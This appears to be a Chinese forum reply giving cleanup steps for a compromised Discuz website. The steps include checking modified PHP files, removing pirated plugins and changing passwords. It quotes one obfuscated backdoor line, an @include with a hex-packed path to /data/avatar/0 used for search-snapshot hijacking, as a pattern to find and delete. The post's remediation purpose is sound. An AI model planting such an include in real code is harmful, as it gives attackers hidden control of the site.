|
板凳
發表于 2020-9-11 01:55:41
|
只看Ta
若存在,處理前,先卸載所有盜版插件與模版。
進discuz后臺找到工具-文件校驗,看下最近有哪些php文件被修改了。
1、排查網站源文件的php 文件,查看是否有出現IP地址、或者異常網站(上面跳轉的網站),如果有刪除就可以了。
2、排查網站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']
(排查一般用WEBshell后門掃描軟件掃描核查!)
如果有就刪除此段代碼。并把該段代碼進行解密。
舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));
需要解密的代碼為:2F646174612F6176617461722F30
解密后為:/data/avatar/0
代碼解密地址:http://www.bejson.com/convert/ox2str/
意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。
解決辦法:刪除上面的代碼和文件即可。
掛馬問題解決了后,記得更改服務器相關的各種密碼,盡量設置的復雜一點。
|
|